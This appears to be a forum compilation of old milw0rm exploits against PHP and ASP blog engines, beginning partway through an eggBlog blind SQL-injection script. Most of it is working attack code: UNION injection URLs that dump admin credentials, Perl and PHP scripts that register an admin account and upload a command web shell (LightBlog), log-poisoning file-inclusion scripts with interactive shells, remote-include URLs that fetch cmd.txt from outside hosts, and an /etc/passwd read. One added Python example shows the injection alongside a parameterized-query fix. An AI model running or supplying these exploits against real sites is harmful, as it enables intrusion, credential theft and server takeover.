$fleft->Label(-text => 'by gemaglabin and Elekt ', -font => '{Verdana} 7 bold', -foreground => 'red')->pack();
$fleft->Label(-text => '( mafia of antichat.ru ) ', -font => '{Verdana} 7 bold', -foreground => 'red')->pack();
$fleft->Label(-text => ' 2007.02.04 ( fixed ) ', -font => '{Verdana} 7 bold', -foreground => 'red')->pack();
$fright->Label(-text => '', -font => '{Verdana} 3 bold', -foreground => 'red')->pack();
$print = $fright->Text(-width => 35, -height => 5, -wrap => "word")->pack(-side => "top", -anchor => "s");
MainLoop();

# walk the 32 hex characters of the hash, trying each candidate until the oracle says yes
sub get_hash() {
    srand();
    $xpl = LWP::UserAgent->new() or die;
    $InfoWindow = $mw->DialogBox(-title => 'get hash from database', -buttons => ["OK"]);
    $i = 1;
    $b = 0;
    $report = '';
    my ($sec, $min, $hour, $mday, $mon, $year, $wday, $yday, $isdst) = localtime(time);
    $print->insert('end', "- Start [$hour:$min:$sec]\n");
    # candidate codes: '0'..'9', ':', 'a'..'f'
    my @brutearray = qw(48 49 50 51 52 53 54 55 56 57 58 97 98 99 100 101 102);
    while (length($report) < 32) {
        $num = $brutearray[$b];
        $ret = get_pchar();
        if ($ret > 0) {
            $print->insert('end', "- char [$num] = ".chr($num)."\n");
            $report .= chr($num);
            $b = 0;
            $i = $i + 1;
            $mw->update();
        } else {
            $b = $b + 1;
        }
    }
    my ($sec, $min, $hour, $mday, $mon, $year, $wday, $yday, $isdst) = localtime(time);
    $print->insert('end', "- Finish [$hour:$min:$sec]");
}

# error-based oracle: a wrong guess evaluates "(select 1 union select 2)" as a scalar,
# which is a MySQL error ("Subquery returns more than 1 row") that shows up in the page
sub get_pchar() {
    $res = $xpl->get($url, 'Cookie' => "eggblogemail=%;eggblogpassword=' or 1=if(ascii(substring((select password from ".$prefix."members where id=$user_id),$i,1))=$num,1,(select 1 union select 2))/*");
    if ($res->as_string =~ /MySQL/i) { return 0; } else { return 1; }
}

sub test_vuln() {
    $xpl = LWP::UserAgent->new() or die;
    $res = $xpl->get($url, 'Cookie' => "eggblogemail=%;eggblogpassword='");
    if ($res->is_success) {
        $rep = '';
        if ($res->as_string =~ /MySQL/i) { $print->insert('end', "- BLOG VULNERABLE\n"); }
        else { $print->insert('end', "- BLOG UNVULNERABLE\n"); }
    }
}
# milw0rm.com [2008-01-07]

zBlog v1.2 SQL Injection
Code:
http://www.xxx.org/zblog/index.php?page=categ&categ=-1%20union%20select%201,pseudo_admin,motdepasse_admin,4,5,6,7,8,9,10,11,12,13,14,15,16,email_admin%20from%20zblog_admins--

mBlog 1.2 Remote File Disclosure
Vulnerable code:
PHP:
./includes/tpl.php, 41-56:
...
41 // load_tpl
42 // loding a template file into a varible.
43 // use quick_tpl to display template
44 function load_tpl ($path)
45 {
46     $tpl = '';
47     global $tpl_block;
48
49     if (substr ($path, -4) == '.tpl')
50     {
51         if (strpos (Cur_Url (), 'includes%2F') OR strpos (Cur_Url (), 'admin%2F') OR strpos (Cur_Url (), 'members%2F')) $path = '../'.$path;
52         if (!file_exists ($path)) die ("<B>Template $path not found! Contact webmaster.</B>");
53         $fp = fopen($path,'r');
54         while(!feof($fp)) $tpl .= fgets($fp,4096);
55         fclose ($fp);
56     }
...
load_tpl() 'loading a template file into a varible.' ;]
./index.php, 24-30:
...
24 // proses cmd
25 switch ($mode)
26 {
27     case 'page':
28         $txt['main_body'] = quick_tpl (load_tpl ($config['skin']."/$page.tpl"), 0);
29         flush_tpl ();
30         break;
...

Quick and Dirty Blog 0.4 Local File Inclusion

LightBlog 8.4.1.1 Remote Code Execution
PHP:
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "
LightBlog 8.4.1.1 Remote Code Execution Exploit
by BlackHawk <[email protected]> <http://itablackhawk.altervista.org>
Thanks to rgod for the php code and Marty for the Love
";
if ($argc<3) {
echo "Usage: php ".$argv[0]." Host Path
Host:    target server (ip/hostname)
Path:    path of lightblog
Example: php ".$argv[0]." localhost /lightblog/ dir";
die;
}

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

// hex + ascii dump helper (debugging aid, unused in the exploit flow)
function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

// raw HTTP over a socket, optionally through an ip:port proxy; the response lands in $html
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$cmd="";
for ($i=3; $i<=$argc-1; $i++){
$cmd.=" ".$argv[$i];
}
$cmd=urlencode($cmd);
$port=80;
$proxy="";

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

echo "Step 0 - If Shell already exists, run it..\r\n";
$packet ="GET ".$p."images/piggy_marty.php?cmd=$cmd HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"666999"))
{
  echo "Exploit succeeded...\r\n";
  $temp=explode("666999",$html);
  die("\r\n".$temp[1]."\r\n");
}

echo 'Step 1 - Creating New User (Name: Piggy_Marty Pwd: DAFORNO_IMPERAT)..';
//Retrieving the "confirmation" code
$packet ="GET ".$p."register.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
preg_match('#<b>([a-zA-Z0-9]+?)</b><input name="rand" type="hidden" value="([a-zA-Z0-9]+?)" />#is', $html, $fuori);
$conf_code = $fuori[1];
$rand_code = $fuori[2];

//Doing the registration
$data="rand=$rand_code&val=$conf_code&username_post=Piggy_Marty&pwd1_post=DAFORNO_IMPERAT&pwd2_post=DAFORNO_IMPERAT&name_post=Piggy_Marty&[email protected]";
$packet="POST ".$p."register.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";   // original hard-coded "localhost" here; the target is $host
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);

// no auth check on cp_memberedit.php: any request can set a member's type
echo 'Step 2 - Promoting Piggy_Marty to admin level..';
$data="type_post=admin&username_post=Piggy_Marty";
$packet="POST ".$p."cp_memberedit.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";   // same fix as above
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);

// the "image" upload accepts a .php file; it writes the real shell (piggy_marty.php) next to itself
echo 'Step 3 - Uploading Shell Creator..';
$data="-----------------------------7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"image\"; filename=\"piggy_marty_creator.php\"\r\n";
$data.="Content-Type:\r\n\r\n";
$data.="<?php \$fp=fopen('piggy_marty.php','w'); fputs(\$fp,'<?php error_reporting(0); set_time_limit(0); if (get_magic_quotes_gpc()) { \$_GET[cmd]=stripslashes(\$_GET[cmd]); } echo 666999; passthru(\$_GET[cmd]); echo 666999; ?>'); fclose(\$fp); chmod('piggy_marty.php',0777); ?>\r\n";
$data.='-----------------------------7d529a1d23092a
Content-Disposition: form-data; name="title"

Not so good if you see this..
-----------------------------7d529a1d23092a
Content-Disposition: form-data; name="post"

An Exploit has attacked your site..
contact [email protected] for more details -----------------------------7d529a1d23092a-- '; $packet="POST ".$p."main.php HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n"; $packet.="Referer: http://".$host.$path."/\r\n"; $packet.="Cookie: Lightblog_username=Piggy_Marty&Lightblog_password=DAFORNO_IMPERAT\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cache-Control: no-cache\r\n\r\n"; $packet.=$data; sendpacketii($packet); sleep(1); echo 'Step 4 - Executing Creator..'; $packet ="GET ".$p."images/piggy_marty_creator.php HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); sleep(1); echo "Step 5 - Execute Commands..\r\n"; $packet ="GET ".$p."images/piggy_marty.php?cmd=$cmd HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (strstr($html,"666999")) { echo "Exploit succeeded...\r\n"; $temp=explode("666999",$html); die("\r\n".$temp[1]."\r\n"); } # Coded With BH Fast Generator v0.1 ?> # milw0rm.com [2007-10-09] Furkan Taştan Blog SQL Injection JBlog 1.0 SQL Injection PHP: ################################################## # Script....................................: JBlog ver 1.0 # Script Site...........................: http://www.jmuller.net/jblog/index.php # Vulnerability........................: Remote SQL injection Exploit # Access..................................: Remote # level......................................: Dangerous # Author..................................: S4mi # Contact.................................: 
S4mi[at]LinuxMail.org ################################################## #Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, r0_0t, ddx39 ..... # ################################################## #Vuln : #http://127.0.0.1/jblog/index.php?id=[SQL] #http://127.0.0.1/jblog/admin/modifpost.php?id=[SQL] (shoud have access to admin area "use my last JBlog Xploit") #Probably Other files are affected #************************************* #Usage : C:\Xploit.pl 127.0.0.1 /Jblog/ #Result Screen Shout : #************************************* # Connecting ...[OK] # Sending Data ...[OK] # # + Exploit succeed! Enjoy. # + ---------------- + # + Password: e10adc3949ba59abbe56e057f20f883e # + Username: admin ################################################### #!/usr/bin/perl use IO::Socket ; &header(); &usage unless(defined($ARGV[0] && $ARGV[1])); $host = $ARGV[0]; $path = $ARGV[1]; syswrite STDOUT ,"\n Connecting ..."; my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",); die "\n Unable to connect to $host\n" unless($sock); syswrite STDOUT, "[OK]"; $inject = "union%20select%200,login,pass,3,4,5%20from%20auteur%20WHERE%20id=1/*"; syswrite STDOUT ,"\n Sending Data ..."; print $sock "GET $path/index.php?id='$inject HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Referer: $host\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; print $sock "Cache-Control: no-cache\n"; print $sock "Connection: Close\n\n"; syswrite STDOUT ,"[OK]\n\n"; while($answer = <$sock>){ if ($answer =~ /class='titre'>(.*?)<\/span>/){ print "+ Exploit succeed! 
Enjoy.\n"; print "+ ---------------- +\n"; print "+ Password: $1\n"; } if($answer =~ / '(.*?)' /){ print "+ Username: $1\n"; } } sub usage{ print "\nUsage : perl $0 host /path/ "; print "\nExemple : perl $0 www.victim.com /JBlog/\n"; exit(0); } sub header(){ print q( ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Script.................: JBlog ver 1.0 Script Site............: http://www.jmuller.net/jblog/index.php Vulnerability..........: Remote SQL injection Exploit Access.................: Remote level..................: Dangerous Author.................: S4mi Contact................: S4mi[at]LinuxMail.org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ); } # milw0rm.com [2007-09-14]
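The FlashBlog, zBlog and JBlog payloads above are all the same move: a negative id followed by UNION SELECT with as many columns as the original query, with the credentials placed in whichever column the page renders. The following is an added example for this thread, not code from the page or from any of the engines it lists. It rebuilds that pattern in SQLite so it runs offline: a string-built article lookup, a column-count search driven by the database error (what the BrewBlogger exploit further down does by hand with a 210-column SELECT), the extraction itself, and the same lookup with a bound parameter. Table and column names (articles, usuarios, email / NombreUsuario / Password) are assumptions chosen to mirror the FlashBlog payload; the data is constructed.

```python
"""UNION-based extraction against a string-built query, plus the fix.

Added example; not code from the page or from any blog engine it lists.
Schema and sample rows are constructed to mirror the FlashBlog payload.
"""
import hashlib
import sqlite3

ADMIN_HASH = hashlib.md5(b"s3cret").hexdigest()  # constructed sample credential


def build_db() -> sqlite3.Connection:
    """Constructed sample data: one article and one admin account."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        "CREATE TABLE articles (id INTEGER, title TEXT, body TEXT, autor TEXT);"
        "CREATE TABLE usuarios (id INTEGER, email TEXT, NombreUsuario TEXT, Password TEXT);"
        "INSERT INTO articles VALUES (1, 'Hello', 'first post', 'admin');"
    )
    con.execute("INSERT INTO usuarios VALUES (1, ?, ?, ?)",
                ("admin@example.invalid", "admin", ADMIN_HASH))
    return con


def leer_articulo_vulnerable(con: sqlite3.Connection, articulo_id: str) -> list:
    """The vulnerable shape: the request parameter is concatenated into the SQL text."""
    sql = "SELECT id, title, body, autor FROM articles WHERE id = " + articulo_id
    return con.execute(sql).fetchall()


def leer_articulo_safe(con: sqlite3.Connection, articulo_id: str) -> list:
    """Same lookup with a bound parameter: the payload is compared as a value,
    never parsed as SQL, so the UNION never reaches the query planner."""
    return con.execute(
        "SELECT id, title, body, autor FROM articles WHERE id = ?", (articulo_id,)
    ).fetchall()


def find_column_count(con: sqlite3.Connection, max_cols: int = 64) -> int:
    """Grow 'UNION SELECT NULL,...' until the engine stops rejecting the column
    count; the database error is the oracle (BrewBlogger guesses this by hand)."""
    for n in range(1, max_cols + 1):
        payload = "-1 UNION SELECT " + ",".join(["NULL"] * n)
        try:
            leer_articulo_vulnerable(con, payload)
            return n
        except sqlite3.OperationalError as exc:
            if "number of result columns" not in str(exc):
                raise
    raise RuntimeError("column count not found")


def dump_admin(con: sqlite3.Connection, ncols: int) -> str:
    """Put 'email :: user :: hash' into the column the page renders (the title
    slot, index 1); concat(...,0x203a3a20,...) in the FlashBlog payload is the
    MySQL spelling of the same thing."""
    cols = ["NULL"] * ncols
    cols[1] = "email || ' :: ' || NombreUsuario || ' :: ' || Password"
    payload = "-1 UNION SELECT " + ",".join(cols) + " FROM usuarios"
    rows = leer_articulo_vulnerable(con, payload)
    return rows[0][1]


if __name__ == "__main__":
    db = build_db()
    n = find_column_count(db)
    print("columns in the original SELECT:", n)
    print("leaked through the title slot:", dump_admin(db, n))
    print("same payload, bound parameter:",
          leer_articulo_safe(db, "-1 UNION SELECT NULL,NULL,NULL,NULL"))
```

The column-count loop stops at the first UNION the engine accepts; MySQL reports the mismatch with a different message ("The used SELECT statements have a different number of columns"), so the string match in find_column_count() is the one line to adapt when pointing this at another backend.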
SimpleBlog 3.0 SQL Injection PHP: #!/usr/bin/perl #++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++# # SimpleBlog 3.0 [ comments_get.asp ] # # ] Remote SQL Injection [ # # # # [c]ode by TrinTiTTY [at] g00ns.net # # Vulnerability by MurderSkillz # # # # shoutz: z3r0, kat, str0ke, rezen, fish, wicked, clorox, # # Canuck, a59, sess, bernard, + the rest of g00ns # # [irc.g00ns.net] [www.g00ns.net] [ts.g00ns.net] # #++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++# use LWP::UserAgent; $host = @ARGV[0]; $ua = LWP::UserAgent->new; my $inject ='comments_get.asp?id=-99%20union%20all%20select%201,2,uUSERNAME,4,uPASSWORD,6,7,8,9%20from%20T_USERS'; if (@ARGV < 1){&top( );&usage( )} elsif ($host =~ /http:\/\//){print"\n\n [-] Don't use http:// in host\n";exit( 0 );} else { &xpl( ) } sub xpl( ) { &top( ); print "\n [~] Connecting\n"; $res = $ua->get("http://$host/$inject"); $con = $res->content; print "\n [~] Checking for admin info\n"; if ($con =~ /<strong>([-_+.\w]{1,15})<\/strong>/gmi) { print "\n\t [+] Admin user: $1\n"; } if ($con =~ /<a href\=\"http:\/\/(.*)\" target\=\"\_blank\">(.*)<\/a>/gmi) { print "\n\t [+] Admin password: $2\n"; print "\n [+] Complete\n"; } else { print "\n [-] Unable to retrieve admin info\n"; exit(0); } } sub top( ) { print q { ################################################################## # SimpleBlog 3.0 [ comments_get.asp ] # # ] Remote SQL Injection [ # # # # [c]ode by TrinTiTTY [at] g00ns.net # # Vulnerability by MurderSkillz # ################################################################## } } sub usage( ) { print "\n Usage: perl simpleblog3.pl <host>\n"; print "\n Example: perl simpleblog3.pl www.example.com/path\n\n"; exit(0); } # milw0rm.com [2007-07-28] BlogSite Professional SQL Injection Code: http://www.server.com/index.php?page_id=-1&news_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6/**/FROM/**/websiteadmin_admin_users/* 6ALBlog SQL Injection Code: 
http://[Taget]/[Path]/member.php?page=comments&member=MEMBERNAME&newsid=-1%20union%20select%200,1,concat(user,0x3a,pass),3,4,5,6,7%20from%20blog_users/* BlogMe 3.0 SQL Injection Code: /blogme/archshow.asp?var=-99%20Union+all+select+0,1,2,3,4,username,password,7,8,9,10,0+from+admin Archangel Weblog 0.90.02 Local File Inclusion Code: http://Target.com/blog/index.php?index=../../../../etc/passwd%00 sBLOG 0.7.3 Beta Local File Inclusion PHP: #!/usr/bin/perl # sBLOG 0.7.3 Beta(inc/lang.php)Local File Inclusion Exploit # D.Script: http://sourceforge.net/projects/sblog/ # V.Code: # if(isset($conf_lang_default) && file_exists('lang/' . $conf_lang_default . '.php')) # require('lang/' . $conf_lang_default . '.php'); # Discovered & Coded by : GolD_M = [Mahmood_ali] # Contact:[email protected] # Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group # Thanx : w4ck1ng.com & cyb3rt & 020 use IO::Socket; use LWP::Simple; #ripped @apache=( "../../../../../var/log/httpd/access_log", "../../../../../var/log/httpd/error_log", "../apache/logs/error.log", "../apache/logs/access.log", "../../apache/logs/error.log", "../../apache/logs/access.log", "../../../apache/logs/error.log", "../../../apache/logs/access.log", "../../../../apache/logs/error.log", "../../../../apache/logs/access.log", "../../../../../apache/logs/error.log", "../../../../../apache/logs/access.log", "../logs/error.log", "../logs/access.log", "../../logs/error.log", "../../logs/access.log", "../../../logs/error.log", "../../../logs/access.log", "../../../../logs/error.log", "../../../../logs/access.log", "../../../../../logs/error.log", "../../../../../logs/access.log", "../../../../../etc/httpd/logs/access_log", "../../../../../etc/httpd/logs/access.log", "../../../../../etc/httpd/logs/error_log", "../../../../../etc/httpd/logs/error.log", "../../.. 
/../../var/www/logs/access_log", "../../../../../var/www/logs/access.log", "../../../../../usr/local/apache/logs/access_log", "../../../../../usr/local/apache/logs/access.log", "../../../../../var/log/apache/access_log", "../../../../../var/log/apache/access.log", "../../../../../var/log/access_log", "../../../../../var/www/logs/error_log", "../../../../../var/www/logs/error.log", "../../../../../usr/local/apache/logs/error_log", "../../../../../usr/local/apache/logs/error.log", "../../../../../var/log/apache/error_log", "../../../../../var/log/apache/error.log", "../../../../../var/log/access_log", "../../../../../var/log/error_log" ); if (@ARGV < 3) { print " =============================================================== # sBLOG 0.7.3 Beta(inc/lang.php)Local File Inclusion Exploit # # Gold.pl [Victim] / (apachepath) # # Ex: Gold.pl [Victim] / ../logs/error.log # =============================================================== # Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group # # Thanx : w4ck1ng.com & cyb3rt & 020 # =============================================================== "; exit(); } $host=$ARGV[0]; $path=$ARGV[1]; $apachepath=$ARGV[2]; print "Code is injecting in logfiles...\n"; $CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>"; $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connection failed.\n\n"; print $socket "GET ".$path.$CODE." 
HTTP/1.1\r\n";
print $socket "user-Agent: ".$CODE."\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
print "Write END to exit!\n";
print "If not working try another apache path\n\n";
print "[shell] ";$cmd = <STDIN>;
chomp($cmd);   # strip the newline, otherwise it lands inside the request line
while($cmd !~ "END") {
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connection failed.\n\n";
    #now include parameter
    print $socket "GET ".$path."/inc/lang.php?conf_lang_default=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1\r\n";
    print $socket "Host: ".$host."\r\n";
    # the injected PHP reads $HTTP_COOKIE_VARS[cmd], so the command has to travel as a cookie too
    print $socket "Cookie: cmd=$cmd\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Connection: close\r\n\r\n";
    while ($raspuns = <$socket>) { print $raspuns; }
    print "[shell] "; $cmd = <STDIN>;
    chomp($cmd);
}
# milw0rm.com [2007-03-29]

WBBlog (XSS/SQL)
Code:
index.php?cmd=viewentry&e_id=-1/**/UNION/**/SELECT/**/null,null,u_email,null,u_password,null/**/FROM/**/user/*

WebLog File Disclosure

BP Blog 7.0 SQL Injection
Code:
http://www.Site.Com/Path/default.asp?layout=-1%20%20union%20select%201,fldauthorusername,fldauthorpassword,1,1,1,1%20from%20tblauthor%20where%201=1
Admin panel:

b2 Blog <= 0.5 Remote File Include
Code:
http://www.site.***/[path]/b2verifauth.php?index=http://mdxshell.txt?

BLOG:CMS <= 4.1.3 Remote Inclusion
Code:
http://site.com/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=http://www.soqor.net/tools/cmd.txt?admin

WikyBlog 1.3.2 Local File Inclusion
PHP:
################################################################################################# # r0ut3r Presents... # # # # Another r0ut3r discovery! 
# # writ3r [at] gmail.com # # # # WikyBlog Local File Inclusion Exploit # ################################################################################################# # Software: WikyBlog 1.3 # # # # Vendor: http://www.wikyblog.com/ # # # # Released: 2006/12/01 # # # # Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com) # # # # Note: The information provided in this document is for WikyBlog administrator # # testing purposes only! # # # # This exploit makes use of a local file inclusion exploit in # # WikyBlog to allow command execution. Firstly it locates an # # access_log, or error_log then it inserts a PHP Shell into # # the log file and returns a link for command execution. # # # # include/WBmap.php?l=file_to_include%00 # # register_globals being on does not affect this vulnerability # ################################################################################################# use IO::Socket; use Switch; $port = "80"; # connection port $target = @ARGV[0]; # localhost $folder = @ARGV[1]; # /wikyblog/ sub Header() { print q {################################################################################################# # r0ut3r Presents... # # # # Another r0ut3r discovery! 
# # writ3r [at] gmail.com # # # # WikyBlog Local File Inclusion Exploit # ################################################################################################# }; } sub Usage() { print q {Usage: wikyblogxpl1.3.pl [target] [folder] Example: wikyblogxpl1.3.pl localhost /wikyblog/ }; exit(); } Header(); if (!$target || !$folder) { Usage(); } # log list taken from Kacper's http://www.milw0rm.com/exploits/2253 @paths=( "../../../../../var/log/httpd/access_log", "../../../../../var/log/httpd/error_log", "../apache/logs/error.log", "../apache/logs/access.log", "../../apache/logs/error.log", "../../apache/logs/access.log", "../../../apache/logs/error.log", "../../../apache/logs/access.log", "../../../../apache/logs/error.log", "../../../../apache/logs/access.log", "../../../../../apache/logs/error.log", "../../../../../apache/logs/access.log", "../logs/error.log", "../logs/access.log", "../../logs/error.log", "../../logs/access.log", "../../../logs/error.log", "../../../logs/access.log", "../../../../logs/error.log", "../../../../logs/access.log", "../../../../../logs/error.log", "../../../../../logs/access.log", "../../../../../etc/httpd/logs/access_log", "../../../../../etc/httpd/logs/access.log", "../../../../../etc/httpd/logs/error_log", "../../../../../etc/httpd/logs/error.log", "../../../../../var/www/logs/access_log", "../../../../../var/www/logs/access.log", "../../../../../usr/local/apache/logs/access_log", "../../../../../usr/local/apache/logs/access.log", "../../../../../var/log/apache/access_log", "../../../../../var/log/apache/access.log", "../../../../../var/log/access_log", "../../../../../var/www/logs/error_log", "../../../../../var/www/logs/error.log", "../../../../../usr/local/apache/logs/error_log", "../../../../../usr/local/apache/logs/error.log", "../../../../../var/log/apache/error_log", "../../../../../var/log/apache/error.log", "../../../../../var/log/access_log", "../../../../../var/log/error_log" ); print "[+] Attempting to locate log 
file\n"; $log = ""; foreach $path (@paths) { $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n"; print $sock "GET ".$folder."include/WBmap.php?l=".$path."%00 HTTP/1.1\n"; print $sock "Host: $target\n"; print $sock "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n"; print $sock "Accept: text/html\n"; print $sock "Connection: close\n\n\r\n"; #locate log file part taken from Kacper's http://www.milw0rm.com/exploits/2253 $out = ""; while ($answer = <$sock>) { $out.=$answer; } close($sock); if ($out =~ m/_exppl_(.*?)_exppl_/ms) { print "[+] Log file found! [".$path."] \n"; $log = $path; } } if ($log eq "") { print "[-] Log file not found. Exiting...\n"; exit(); } print "[+] Inserting PHP Shell into logs\n"; $code = "<?php ob_clean(); echo ".$cmdfunct."(\$_GET['cmd']); die(); ?>"; $xpl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n"; print $xpl "GET /".$code." HTTP/1.1\n"; print $xpl "Host: $target\n"; print $xpl "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n"; print $xpl "Accept: text/html\n"; print $xpl "Connection: close\n\n\r\n"; print "[+] Sent code...\n"; print "[!] Command execution at: ".$target.$folder."include/WBmap.php?l=".$log."%00"; # milw0rm.com [2006-12-01] SimpleBlog <= 2.3 SQL Injection Code: http://[target]/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users BrewBlogger 1.3.1 SQL Injection PHP: #!/usr/bin/perl ########################################################################################### #Target: # # BewBlogger 1.3.1 # http://brewblogger.zkdigital.com # #Vulnerability: # # SQL Injection # #Description: # # BrewBlogger does not properly sanitize the 'id=' parameter passed to printLog.php. 
# Since each user entry contains an auto-incrementing ID number, it is possible to # enumerate all user names and passwords stored in the 'users'database by iterating # through every possible ID number. # #Vulnerable Code (truncated): # # $colname_log = (get_magic_quotes_gpc()) ? $_GET['id'] : addslashes($_GET['id']); # $query_log = sprintf("SELECT * FROM brewing WHERE id = %s", $colname_log); # $log = mysql_query($query_log, $brewing) or die(mysql_error()); # #Usage: # This script will produce a URL which will reveal the user name and password for # the specified ID. If no ID is specified, 2 is used (seems to be the usual ID for # the first user). The user name will be listed as "Method:" under 'General # Information', and the password will be listed as "Cost:". # #Usage: # ./brewblog.pl <domain name + path> [user id] # #Examples: # # ./brewblogger.pl www.beerblog.com 3 # ./brewblogger.pl www.mysite.com/beerblog # #Google Dork: # # intext:"BrewBlogger for PHP" # #Discovery/code: # # Craig Heffner # heffnercj [at] gmail.com # http://www.craigheffner.com ########################################################################################### print ' ########################################### # BrewBlogger 1.3.1 SQL Injection Exploit # # # # Discovered and coded by: Craig Heffner # ########################################### '; if(!$ARGV[0] || $ARGV[0] eq "-h"){ print "\nUsage: ./brewlogger.pl <domain name + path> [user id]\n\nSee script comments for more details\n"; exit; } if(!$ARGV[1]){ $id = 2; } else { $id = $ARGV[1]; } $url = "http://" . $ARGV[0] . "/printLog.php?id=0+UNION+SELECT+"; $a = 1; while($a < 211){ if($a == 8){ $string .= "user_name,"; } elsif($a == 9){ $string .= "password,"; } elsif($a == 210){ $string .= "1"; } else { $string .= "1,"; } $a++; } print "\n\nUse the following URL:\n\n" . $url . $string . "+FROM+users+WHERE+id=" . $id . 
"\n";
exit;
